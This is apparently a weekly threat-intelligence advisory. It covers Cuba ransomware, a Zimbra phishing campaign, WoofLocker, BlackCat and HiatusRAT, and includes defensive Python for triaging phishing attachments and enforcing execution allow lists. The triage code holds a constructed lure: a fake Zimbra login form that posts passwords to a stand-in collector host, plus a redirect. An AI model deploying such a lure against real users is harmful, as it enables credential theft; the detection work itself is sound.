Zimbra email users face targeted credential theft attacks

SISA Weekly Threat Watch - 28 August 2023

Over the past week, the cybersecurity landscape has witnessed a dynamic surge in digital threats, highlighting the ever-evolving tactics of malicious actors. From targeted campaigns compromising Zimbra email users to Cuba ransomware’s strategic evolution, the emergence of WoofLocker’s deceptive toolkit, and the resurgence of HiatusRAT’s attacks, a series of impactful incidents has unfolded. As these diverse and complex cyber threats continue to evolve, the importance of robust cybersecurity practices cannot be overstated.

SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.

1. Cuba ransomware targets critical U.S. sectors using the Veeam exploit

The Cuba ransomware threat group has exhibited an evolution in their tactics, techniques, and procedures (TTPs). In a recent campaign in June, they attacked an organization in the U.S. critical infrastructure sector and an IT integrator in Latin America, in which they used a combination of previously known methods along with the introduction of new tools to compromise their targets. In the initial stage of the attack, they deployed BUGHATCH, a custom downloader specific to this group. This downloader makes a connection to a command-and-control (C2) server and fetches payloads of the attacker’s choice, often small PE files or PowerShell scripts.

Metasploit, a popular penetration testing framework, was used by the Cuba operators to gain an initial foothold within the target environment. Furthermore, the group leveraged the ‘ZeroLogon’ vulnerability, a Microsoft NetLogon protocol flaw. This vulnerability could escalate privileges against Active Directory (AD) domain controllers, potentially giving attackers control of a vulnerable domain. A new addition in this campaign was the exploit for the Veeam vulnerability CVE-2023-27532. This vulnerability, if exploited, grants the attacker access to credentials stored in the configuration file of the Veeam Backup & Replication software. It is crucial for organizations to invest in robust cybersecurity infrastructure and practices such as network monitoring, endpoint security, and access control to safeguard their assets and data from such evolving attacks.

2. New wave of attack campaigns targeting Zimbra email users for credential theft

Security researchers have identified an active phishing campaign aimed at Zimbra Collaboration software users. The crux of this campaign centers around deceptive emails purportedly from email server administrators. These emails use various social engineering tactics to create a sense of urgency or importance. Examples include notifications of an email server update or impending account deactivation.

Attached to these emails is an HTML file. When opened, this file redirects the user to a counterfeit Zimbra login page. Once submitted, the login credentials are sent to a server under the attacker’s control. A particularly concerning detail is the attackers’ use of already-compromised Zimbra accounts. These accounts serve a dual purpose: they legitimize subsequent phishing emails (as they come from genuine accounts) and amplify the campaign’s reach. Organizations must remain vigilant, combining both technical safeguards like robust email security controls and Two-Factor Authentication (2FA) as well as user education to defend against such threats.
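The HTML-attachment lure described above can be triaged statically before a user ever opens it: the two traits that matter are a password form whose action posts off-domain and a script or meta-refresh redirect to a host the organization does not use for sign-in. The following is an added example written for this advisory, not code from SISA or from the researchers who reported the campaign; the trusted host `mail.example.org`, the sample attachment and the collector/redirect hostnames in it are all constructed.

```python
"""Static triage of an HTML e-mail attachment for credential-phishing traits."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the organisation legitimately uses for Zimbra sign-in (constructed value).
TRUSTED_HOSTS = {"mail.example.org"}

# Constructed sample attachment: a lookalike login form that posts to an
# off-domain collector, plus a JavaScript redirect. Not a real campaign sample.
SAMPLE_ATTACHMENT = """
<html><head><title>Zimbra Web Client Sign In</title>
<script>
  setTimeout(function(){ window.location = "https://login-zimbra-update.example.net/"; }, 3000);
</script></head>
<body>
<form method="post" action="https://collector.example.net/post.php">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Sign In">
</form></body></html>
"""


class _FormCollector(HTMLParser):
    """Collects form actions, password inputs, meta-refresh targets and inline script text."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.password_fields = 0
        self.meta_refresh = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            self.meta_refresh.append(a.get("content") or "")
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


# Matches assignments such as  window.location = "https://..."  or  location.href = '...'
_JS_REDIRECT = re.compile(r"""(?:window\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']""")


def extract_targets(html: str) -> dict:
    """Return the URLs the attachment would post credentials to or navigate to."""
    p = _FormCollector()
    p.feed(html)
    redirects = _JS_REDIRECT.findall("".join(p.scripts))
    for content in p.meta_refresh:
        m = re.search(r"url\s*=\s*(\S+)", content, re.I)
        if m:
            redirects.append(m.group(1))
    return {"form_actions": p.form_actions, "redirects": redirects,
            "password_fields": p.password_fields}


def _host(url: str) -> str:
    return (urlparse(url).hostname or "").lower()


def triage(html: str, trusted_hosts=TRUSTED_HOSTS) -> list:
    """List findings for an attachment; an empty list means nothing suspicious was seen."""
    t = extract_targets(html)
    findings = []
    for action in t["form_actions"]:
        h = _host(action)
        # A relative action (no host) in a detached HTML file has nowhere to post; skip it.
        if t["password_fields"] and h and h not in trusted_hosts:
            findings.append(f"password form posts to untrusted host {h}")
    for url in t["redirects"]:
        h = _host(url)
        if h and h not in trusted_hosts:
            findings.append(f"redirect to untrusted host {h}")
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_ATTACHMENT):
        print("FINDING:", f)
```

The check is deliberately conservative: it only reports off-domain hosts, so a genuine Zimbra notice whose links point at the organization's own mail server produces no finding, while the lure's form action and timed redirect each produce one.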

3. WoofLocker toolkit hides malicious codes in images to run tech support scams

WoofLocker is an advanced traffic redirection scheme predominantly employed for tech support scams. It employs advanced techniques like malicious JavaScript embedding and steganography to discern and target genuine users. Upon visiting a compromised site, WoofLocker’s embedded malicious JavaScript is initiated, and it retrieves the WoofLocker framework directly into the Document Object Model (DOM) from a few domain names. Initially, the injected code on compromised sites was straightforward and contained fingerprinting checks. However, by 2021, the threat actors modified this approach.

The code was streamlined, and certain logic components were externalized. This external injection makes detection even more challenging. When using tools like Chrome’s Developer Tools, the injected code becomes visible dynamically within the DOM. The acquired information from each user is relayed back to the server in the form of a PNG image using steganography. If the user is deemed legitimate, they are redirected to a unique URL that displays a fake warning about computer viruses. Users are recommended to restrict unrecognized JavaScript, employ advanced security solutions, and remain vigilant and informed about potential online hazards.

4. New variant of BlackCat ransomware incorporates Impacket and RemCom

BlackCat is a Russian-speaking criminal gang with connections to former REvil members and is thought to be a successor to DarkSide and BlackMatter. A new version of the BlackCat ransomware (aka ALPHV and Noberus) has been discovered that embeds tools like Impacket and RemCom to facilitate lateral movement and remote code execution. Impacket is a set of open-source modules created for network penetration testing, security evaluations, and associated research. According to Microsoft, BlackCat spreads ransomware in target environments by leveraging Impacket’s credential dumping and remote service execution components.

The RemCom tool allows for remote code execution. It is embedded in the ransomware together with usernames and passwords that have already been set up, which allows the operators to spread the ransomware to other computers in the network and lock up more files for ransom. It is recommended that every administrative interface is thoroughly monitored and granularly configured with proper access controls. Organizations can control software execution on client systems based on attributes such as executable file path, hash, and publisher. For most organizations, an allow list can be used to enforce consistency and raise an alert when an anomaly is detected. This allows execution of authorized software only and prevents malicious software or threat actor tools from executing without explicit exception rules.
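The allow-list recommendation above can be expressed as a small policy engine evaluated over process-creation events, with the three attributes the advisory names (path, hash, publisher) as rule types and anything not matched raised as an anomaly. This is an added example written for this advisory, not SISA's or Microsoft's tooling; the rule values, publisher names, file paths and event records are all constructed.

```python
"""Allow-list evaluation over process-creation events; unmatched executions are anomalies."""
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    kind: str    # "path", "hash" or "publisher"
    value: str


@dataclass
class ProcessEvent:
    image_path: str
    sha256: str
    publisher: str   # empty string when the binary is unsigned
    user: str


def _sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed allow list. A real one is derived from the software inventory.
# Path rules are only safe for directories that non-administrators cannot write to;
# hash rules pin one exact build; publisher rules trust everything signed by that CN.
ALLOW_LIST = [
    Rule("path", "C:\\Windows\\System32\\"),
    Rule("publisher", "CN=Example Corp Signing"),
    Rule("hash", _sha256(b"approved build of inventory-agent.exe")),
]

# Constructed process-creation events (hashes are of placeholder byte strings).
SAMPLE_EVENTS = [
    ProcessEvent("C:\\Windows\\System32\\svchost.exe", _sha256(b"os component"), "CN=OS Vendor", "SYSTEM"),
    ProcessEvent("C:\\Program Files\\ExampleCorp\\helpdesk.exe", _sha256(b"helpdesk 4.2"), "CN=Example Corp Signing", "alice"),
    ProcessEvent("C:\\ProgramData\\agent\\inventory-agent.exe", _sha256(b"approved build of inventory-agent.exe"), "", "SYSTEM"),
    # Same file name as an OS binary, but dropped in a user-writable folder and unsigned.
    ProcessEvent("C:\\Users\\Public\\svchost.exe", _sha256(b"unknown dropper"), "", "bob"),
    # Unsigned remote-execution helper written to a temp directory.
    ProcessEvent("C:\\Windows\\Temp\\remote-exec.exe", _sha256(b"unknown remote exec tool"), "", "svc-backup"),
]


def is_allowed(event: ProcessEvent, rules=ALLOW_LIST) -> bool:
    """True if any rule explicitly authorises this execution."""
    for r in rules:
        if r.kind == "hash" and event.sha256.lower() == r.value.lower():
            return True
        if r.kind == "path" and event.image_path.lower().startswith(r.value.lower()):
            return True
        if r.kind == "publisher" and event.publisher and event.publisher == r.value:
            return True
    return False


def find_anomalies(events, rules=ALLOW_LIST) -> list:
    """Events that no rule covers; these are the alerts an allow-list deployment raises."""
    return [e for e in events if not is_allowed(e, rules)]


def alert_lines(events, rules=ALLOW_LIST) -> list:
    """Human-readable alert text for each anomaly."""
    return [f"ALERT: {e.user} ran unapproved binary {e.image_path} "
            f"(signed: {'yes' if e.publisher else 'no'}, sha256: {e.sha256[:16]}...)"
            for e in find_anomalies(events, rules)]


if __name__ == "__main__":
    for line in alert_lines(SAMPLE_EVENTS):
        print(line)
```

Run in audit mode first (alert only) to discover legitimate software the inventory missed, then switch to enforcement once the anomaly list is empty for a representative period; the rule order is irrelevant because any single match authorises the execution.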

5. HiatusRAT returns with a new series of attacks

Researchers have unearthed malicious software, HiatusRAT, specifically targeting outdated DrayTek Vigor routers. The HiatusRAT campaign’s initiation relies heavily on a bash script, a common tool for automating tasks in Linux environments. Once HiatusRAT infiltrates a system, it springs into action, clandestinely logging user activities. Beyond this, it performs detailed reconnaissance, pulling system details ranging from MAC addresses to firmware versions.

Custom tcpdump, another critical component of this campaign, is engineered for precise packet capture on the compromised devices. This tool is not just a passive observer; it actively scans and monitors traffic, specifically focusing on email and file-transfer communications from adjacent LANs. The threat actors behind HiatusRAT have been careful to maintain a minimal digital footprint, thereby evading detection. Organizations are recommended to embrace VPN-based access to insulate and protect sensitive data and adopt cryptographic protocols, such as SSL and TLS, reinforcing data integrity during transfers.

To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.

For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.
